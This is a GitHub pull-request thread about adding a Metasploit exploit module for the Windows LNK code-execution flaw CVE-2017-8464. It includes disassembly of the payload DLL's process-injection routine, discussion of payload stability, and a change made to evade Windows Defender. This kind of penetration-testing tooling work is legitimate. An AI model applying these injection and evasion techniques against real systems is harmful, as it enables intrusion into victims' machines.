  • Windows XP SP3 English: everything goes well, no exception.
  • Windows 7 English X86: explorer.exe crashes, but msf gains a meterpreter session.

I've tried to use EXITFUNC (seh, process, thread), but failed to make it stable. Exception Stack as follow:

Call stack of thread 000008C8
Address    Returns to    Procedure / arguments                 Called from                   Frame      Stack Dump
0223C3F0   77A2F545      ntdll.TpCheckTerminateWorker          ntdll.77A2F540                0223C3EC
0223C404   74041127      ? ntdll.RtlExitUserThread             test.74041121                 0223C400
0223C408   00000000        ExitCode = 0
0223C734   74041147      test.74041050                         test.74041142                 0223C730   00000001 0223C75
0223C740   77A58854      Includes test.74041147                ntdll.77A58851                0223C73C   74040000 0000000
0223C760   77A65B3F      ? ntdll.77A58840                      ntdll.77A65B3A                0223C75C   74041130 7404000
0223C764   74041130      *** CORRUPT ENTRY ***                                               0223C850

74041050   55               PUSH EBP
74041051   8BEC             MOV EBP,ESP
74041053   81EC 24030000    SUB ESP,324
74041059   6A 44            PUSH 44
7404105B   8D45 A8          LEA EAX,DWORD PTR SS:[EBP-58]
7404105E   50               PUSH EAX
7404105F   E8 9CFFFFFF      CALL test.74041000
74041064   83C4 08          ADD ESP,8
74041067   C745 A8 44000000 MOV DWORD PTR SS:[EBP-58],44
7404106E   8D4D EC          LEA ECX,DWORD PTR SS:[EBP-14]
74041071   51               PUSH ECX
74041072   8D55 A8          LEA EDX,DWORD PTR SS:[EBP-58]
74041075   52               PUSH EDX
74041076   6A 00            PUSH 0
74041078   6A 00            PUSH 0
7404107A   6A 44            PUSH 44
7404107C   6A 00            PUSH 0
7404107E   6A 00            PUSH 0
74041080   6A 00            PUSH 0
74041082   68 00380474      PUSH test.74043800                       ; ASCII "rundll32.exe"
74041087   6A 00            PUSH 0
74041089   FF15 0C200474    CALL DWORD PTR DS:[<&KERNEL32.CreateProc>; kernel32.CreateProcessA
7404108F   85C0             TEST EAX,EAX
74041091   0F84 88000000    JE test.7404111F
74041097   C785 DCFCFFFF 03>MOV DWORD PTR SS:[EBP-324],10003
740410A1   8D85 DCFCFFFF    LEA EAX,DWORD PTR SS:[EBP-324]
740410A7   50               PUSH EAX
740410A8   8B4D F0          MOV ECX,DWORD PTR SS:[EBP-10]
740410AB   51               PUSH ECX
740410AC   FF15 10200474    CALL DWORD PTR DS:[<&KERNEL32.GetThreadC>; kernel32.GetThreadContext
740410B2   6A 40            PUSH 40
740410B4   68 00100000      PUSH 1000
740410B9   68 00080000      PUSH 800
740410BE   6A 00            PUSH 0
740410C0   8B55 EC          MOV EDX,DWORD PTR SS:[EBP-14]
740410C3   52               PUSH EDX
740410C4   FF15 18200474    CALL DWORD PTR DS:[<&KERNEL32.VirtualAll>; kernel32.VirtualAllocEx
740410CA   8945 FC          MOV DWORD PTR SS:[EBP-4],EAX
740410CD   6A 00            PUSH 0
740410CF   68 00080000      PUSH 800
740410D4   68 00300474      PUSH test.74043000
740410D9   8B45 FC          MOV EAX,DWORD PTR SS:[EBP-4]
740410DC   50               PUSH EAX
740410DD   8B4D EC          MOV ECX,DWORD PTR SS:[EBP-14]
740410E0   51               PUSH ECX
740410E1   FF15 1C200474    CALL DWORD PTR DS:[<&KERNEL32.WriteProce>; kernel32.WriteProcessMemory
740410E7   8B55 FC          MOV EDX,DWORD PTR SS:[EBP-4]
740410EA   8995 94FDFFFF    MOV DWORD PTR SS:[EBP-26C],EDX
740410F0   8D85 DCFCFFFF    LEA EAX,DWORD PTR SS:[EBP-324]
740410F6   50               PUSH EAX
740410F7   8B4D F0          MOV ECX,DWORD PTR SS:[EBP-10]
740410FA   51               PUSH ECX
740410FB   FF15 14200474    CALL DWORD PTR DS:[<&KERNEL32.SetThreadC>; kernel32.SetThreadContext
74041101   8B55 F0          MOV EDX,DWORD PTR SS:[EBP-10]
74041104   52               PUSH EDX
74041105   FF15 08200474    CALL DWORD PTR DS:[<&KERNEL32.ResumeThre>; kernel32.ResumeThread
7404110B   8B45 F0          MOV EAX,DWORD PTR SS:[EBP-10]
7404110E   50               PUSH EAX
7404110F   FF15 00200474    CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; kernel32.CloseHandle
74041115   8B4D EC          MOV ECX,DWORD PTR SS:[EBP-14]
74041118   51               PUSH ECX
74041119   FF15 00200474    CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; kernel32.CloseHandle
7404111F   6A 00            PUSH 0
74041121   FF15 04200474    CALL DWORD PTR DS:[<&KERNEL32.ExitThread>; ntdll.RtlExitUserThread
74041127   8BE5             MOV ESP,EBP
74041129   5D               POP EBP
7404112A   C3               RETN

screen shot 2017-07-26 at 23 50 50

Show outdated Hide outdated modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
comment = "\x00"
# Control Panel Applet ItemID with our DLL
cpl_applet = [

This comment has been minimized.

@nixawk

nixawk Jul 26, 2017

Contributor

Is there a better way to create an stable cpl_applet ?

@nixawk

nixawk Jul 26, 2017

Contributor

Is there a better way to create an stable cpl_applet ?

This comment has been minimized.

@ykoster

ykoster Jul 26, 2017

Contributor

There is almost no documentation about this structure. At least not that I could find.

With regards to crashing of Explorer, there is an explicit ExitThread(0) in the template DLL. I think this causes the crashes. If I patch it out, Explorer doesn't crash, but the payload runs multiple times. I guess I'll have to replace the template DLLs with my own. See also: https://github.com/rapid7/metasploit-framework/blob/master/data/templates/src/pe/dll/template.c

@ykoster

ykoster Jul 26, 2017

Contributor

There is almost no documentation about this structure. At least not that I could find.

With regards to crashing of Explorer, there is an explicit ExitThread(0) in the template DLL. I think this causes the crashes. If I patch it out, Explorer doesn't crash, but the payload runs multiple times. I guess I'll have to replace the template DLLs with my own. See also: https://github.com/rapid7/metasploit-framework/blob/master/data/templates/src/pe/dll/template.c

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Jul 26, 2017

Contributor

@nixawk added new DLL templates. Successfully tested on:

Windows 7 x86 (Build 7601, Service Pack 1)
Windows 7 x64 (Build 7601, Service Pack 1)
Windows 8.1 x64 (Build 9600)
Windows 10 x64 (Build 14393)

Would it be possible if you test it on Windows 7 x86?

Contributor

ykoster commented Jul 26, 2017

@nixawk added new DLL templates. Successfully tested on:

Windows 7 x86 (Build 7601, Service Pack 1)
Windows 7 x64 (Build 7601, Service Pack 1)
Windows 8.1 x64 (Build 9600)
Windows 10 x64 (Build 14393)

Would it be possible if you test it on Windows 7 x86?

@jooeji

This comment has been minimized.

Show comment
Hide comment
@jooeji

jooeji Jul 27, 2017

_20170727095728
windows defender can Detect poison

jooeji commented Jul 27, 2017

_20170727095728
windows defender can Detect poison

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk
Contributor

nixawk commented Jul 27, 2017

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Jul 27, 2017

Contributor

@jooeji I removed the This PC ItemID from the LinkTargetIDList. This seems enough to bypass Defender at this moment. Could you give it a try?

Contributor

ykoster commented Jul 27, 2017

@jooeji I removed the This PC ItemID from the LinkTargetIDList. This seems enough to bypass Defender at this moment. Could you give it a try?

@jooeji

This comment has been minimized.

Show comment
Hide comment
@jooeji

jooeji Jul 28, 2017

1
the FlashPlayerCPLApp.cpl also is detected poison,but the .lnk isn`t detected poison @ykoster

jooeji commented Jul 28, 2017

1
the FlashPlayerCPLApp.cpl also is detected poison,but the .lnk isn`t detected poison @ykoster

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Jul 28, 2017

Contributor

Thanks for testing @jooeji. There is not a lot I can do to prevent the Meterpreter payload from being detected. If I did it will only be a matter of time before the changes will be detected. You can always use a different payload or provide a DLL yourself.

I also expect that the changed LNK file will be flagged again in the near future. My goal with this module is not to evade AV.

Contributor

ykoster commented Jul 28, 2017

Thanks for testing @jooeji. There is not a lot I can do to prevent the Meterpreter payload from being detected. If I did it will only be a matter of time before the changes will be detected. You can always use a different payload or provide a DLL yourself.

I also expect that the changed LNK file will be flagged again in the near future. My goal with this module is not to evade AV.

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Jul 31, 2017

Contributor

Added source code for template DLLs

Contributor

ykoster commented Jul 31, 2017

Added source code for template DLLs

@3gstudent

This comment has been minimized.

Show comment
Hide comment
@3gstudent

3gstudent Aug 2, 2017

Small change,my explorer.exe doesn't crash.
And Win7 x86 success.
https://github.com/3gstudent/CVE-2017-8464-EXP

:)

Alt text

3gstudent commented Aug 2, 2017

Small change,my explorer.exe doesn't crash.
And Win7 x86 success.
https://github.com/3gstudent/CVE-2017-8464-EXP

:)

Alt text

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Aug 2, 2017

Contributor

@3gstudent the last commits contain new template DLL files that also don't crash. Make sure to checkout all the files

Contributor

ykoster commented Aug 2, 2017

@3gstudent the last commits contain new template DLL files that also don't crash. Make sure to checkout all the files

@3gstudent

This comment has been minimized.

Show comment
Hide comment
@3gstudent

3gstudent commented Aug 2, 2017

@ykoster Good job :)

ykoster added some commits Jul 25, 2017

CVE-2017-8464 LNK Remote Code Execution Vulnerability
This module exploits a vulnerability in the handling of Windows
Shortcut files (.LNK) that contain a dynamic icon, loaded from a
malicious DLL.

This vulnerability is a variant of MS15-020 (CVE-2015-0096). The
created LNK file is similar except in an additional
SpecialFolderDataBlock is included. The folder ID set in this
SpecialFolderDataBlock is set to the Control Panel. This is enought to
bypass the CPL whitelist. This bypass can be used to trick Windows into
loading an arbitrary DLL file.
Replace CreateEvent with CreateMutex/WaitForSingleObject
Time out is set to 1500 ms to prevent running the payload multiple times
Removed This PC ItemID & increased timeout in WaitForSingleObject
Remove the This PC ItemID to bypass (some) AV.

Timeout for WaitForSingleObject is set to 2,5s. After this timeout a
mutex is released allowed a new payload to be executed.

@busterb busterb self-assigned this Aug 2, 2017

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Aug 2, 2017

Contributor

@ykoster it seems that this PR is corrupted with some double-commits. I'm going to fix up the remote branch before landing so that it doesn't cause problems in the master tree later. You will need to do a force update locally, but nothing will be lost.

Contributor

busterb commented Aug 2, 2017

@ykoster it seems that this PR is corrupted with some double-commits. I'm going to fix up the remote branch before landing so that it doesn't cause problems in the master tree later. You will need to do a force update locally, but nothing will be lost.

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Aug 3, 2017

Contributor

@busterb okay, not sure why this happened, but let me know what I can do to help.

Contributor

ykoster commented Aug 3, 2017

@busterb okay, not sure why this happened, but let me know what I can do to help.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Aug 3, 2017

Contributor

Something interesting I have seen in testing with 64-bit on Windows 10 is multiple sessions when clicking the lnk once. I have gotten up to 13 sessions on one click.

Contributor

busterb commented Aug 3, 2017

Something interesting I have seen in testing with 64-bit on Windows 10 is multiple sessions when clicking the lnk once. I have gotten up to 13 sessions on one click.

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Aug 3, 2017

Contributor

@busterb that is correct it invokes DllMain multiple times. It currently uses a mutex that is released after 2,5 seconds to try to avoid this, but this is not perfect. If I set the timeout in WaitForSingleObject to infinite it will hang Explorer. An alternative would be to use CreateEvent, but than it will only run once during the user's sessions. See also https://github.com/ykoster/metasploit-framework/blob/c3bc27385e09873134296ebca9c8a1361b3b74cc/data/exploits/cve-2017-8464/src/template.c

Contributor

ykoster commented Aug 3, 2017

@busterb that is correct it invokes DllMain multiple times. It currently uses a mutex that is released after 2,5 seconds to try to avoid this, but this is not perfect. If I set the timeout in WaitForSingleObject to infinite it will hang Explorer. An alternative would be to use CreateEvent, but than it will only run once during the user's sessions. See also https://github.com/ykoster/metasploit-framework/blob/c3bc27385e09873134296ebca9c8a1361b3b74cc/data/exploits/cve-2017-8464/src/template.c

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Aug 3, 2017

Contributor

Now that I look at it again, I think I messed up the Mutex... Commented out the GetLastError() check. Will look at it later today.

Contributor

ykoster commented Aug 3, 2017

Now that I look at it again, I think I messed up the Mutex... Commented out the GetLastError() check. Will look at it later today.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Aug 3, 2017

Contributor

Well as @mubix would say, two is one and one is none :)

Contributor

busterb commented Aug 3, 2017

Well as @mubix would say, two is one and one is none :)

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Aug 3, 2017

Contributor

As far as the git work, I cleaned it all up and the public branch should be good. Just pull in the updates locally before making any commits yourself.

I have some general cleanup (just stuff that the linter whines about) and added auto-targeting support for this as well - should I just push to your branch or send a PR?

Contributor

busterb commented Aug 3, 2017

As far as the git work, I cleaned it all up and the public branch should be good. Just pull in the updates locally before making any commits yourself.

I have some general cleanup (just stuff that the linter whines about) and added auto-targeting support for this as well - should I just push to your branch or send a PR?

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Aug 3, 2017

Contributor

Pushed a PR to you: ykoster#1

Contributor

busterb commented Aug 3, 2017

Pushed a PR to you: ykoster#1

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Aug 3, 2017

Contributor

Thank you for the cleanup @busterb :). I've updated the template DLLs that should in theory reduce the number of times the payload is invoked.

Contributor

ykoster commented Aug 3, 2017

Thank you for the cleanup @busterb :). I've updated the template DLLs that should in theory reduce the number of times the payload is invoked.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Aug 3, 2017

Contributor

cool - tested and works ok

Contributor

busterb commented Aug 3, 2017

cool - tested and works ok

@busterb busterb merged commit 81500f7 into rapid7:master Aug 3, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb pushed a commit that referenced this pull request Aug 3, 2017

Land #8767, Add exploit module for CVE-2017-8464
LNK Code Execution Vulnerability
@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Aug 3, 2017

Contributor

Release Notes

The exploits/windows/fileformat/cve_2017_8464_lnk_rce module has been added to the framework. This module exploits a vulnerability in the handling of Windows Shortcut, or LNK, files that contain a dynamic icon. This vulnerability is a variant of MS15-020, but with an additional SpecialFolderDataBlock in the created LNK file. The folder ID in this SpecialFolderDataBlock is set to the Control Panel, which is enough to bypass the CPL whitelist and trick Windows into loading an arbitrary DLL file.

Contributor

busterb commented Aug 3, 2017

Release Notes

The exploits/windows/fileformat/cve_2017_8464_lnk_rce module has been added to the framework. This module exploits a vulnerability in the handling of Windows Shortcut, or LNK, files that contain a dynamic icon. This vulnerability is a variant of MS15-020, but with an additional SpecialFolderDataBlock in the created LNK file. The folder ID in this SpecialFolderDataBlock is set to the Control Panel, which is enough to bypass the CPL whitelist and trick Windows into loading an arbitrary DLL file.

@ykoster ykoster deleted the ykoster:cve_2017_8464_lnk_rce branch Aug 4, 2017

@ExplosiveBattery

This comment has been minimized.

Show comment
Hide comment
@ExplosiveBattery

ExplosiveBattery Aug 21, 2017

Hi ,I use vs to produce template_xxx_windows.dll and get two smaller dlls. But failed to use it. And I failed when use the dll in this repo and set PAYLOAD windows/exec( set CMD cacl ) in win7 SP1.

ExplosiveBattery commented Aug 21, 2017

Hi ,I use vs to produce template_xxx_windows.dll and get two smaller dlls. But failed to use it. And I failed when use the dll in this repo and set PAYLOAD windows/exec( set CMD cacl ) in win7 SP1.

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Aug 23, 2017

Contributor

@ExplosiveBattery you can test the DLL by double clicking on the LNK file. You may also want to run Process Monitor to see if your DLL is loaded by Explorer.

Contributor

ykoster commented Aug 23, 2017

@ExplosiveBattery you can test the DLL by double clicking on the LNK file. You may also want to run Process Monitor to see if your DLL is loaded by Explorer.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment